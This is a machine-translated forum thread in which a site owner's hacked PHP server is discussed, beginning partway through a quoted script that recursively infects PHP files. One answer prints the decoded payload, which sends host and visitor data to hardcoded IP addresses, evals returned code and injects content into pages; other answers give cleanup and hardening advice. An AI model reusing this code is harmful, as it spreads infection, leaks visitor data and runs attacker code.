"31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();

在这部分中,脚本会尝试在当前和子目录中查找其他php文件并感染它们。

答案 1 :(得分:5)

我会说删除所有类似的代码段,更改所有密码,如果可能的话,让您的网站脱机,直到支持可以回复给您。肯定看起来没什么好处,经过一些挖掘代码和解码后,我发现了这个:

<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}

答案 2 :(得分:1)

来自安全背景我非常确定您的网络服务器已被黑客入侵。首先,调查来源通常是一个好主意,以防止再次发生错误。

首先:

  • 查找通过时间戳感染的第一批文件。
  • 记录活动的运行脚本以确定导致PHP日志的错误或错误的原因等。

如果您使用的是共享主机,那么您可以做的事情并不多,共享主机用户通常更容易被破解,但如果您使用的是VPS或更高版本,则可以在托管的情况下与您的主机联系托管完整格式或必要的安全性。

然而,事情是删除这些片段将有99.99%的时间没有用,它将来不会阻止饼干。更改密码有帮助,但同样不是一个可靠的解决方案。

如果您有资源,请聘请安全专业人员进行快速审核。有许多人只有在找到弱点时才会要求付款。 如果没有,那么重新评估服务器中的潜在弱点。有关Linux服务器的信息,请参阅此文章(http://www.thegeekstuff.com/2011/03/apache-hardening)。如果你正在使用Windows,请告诉我,我也会将你链接到一些用于Windows IIS的程序。

很高兴我能帮忙!

答案 3 :(得分:0)

它似乎是一个注入您网站的php类型的shell脚本。它可能是网络托管公司或您的个人网络应用程序的漏洞,允许黑客发生。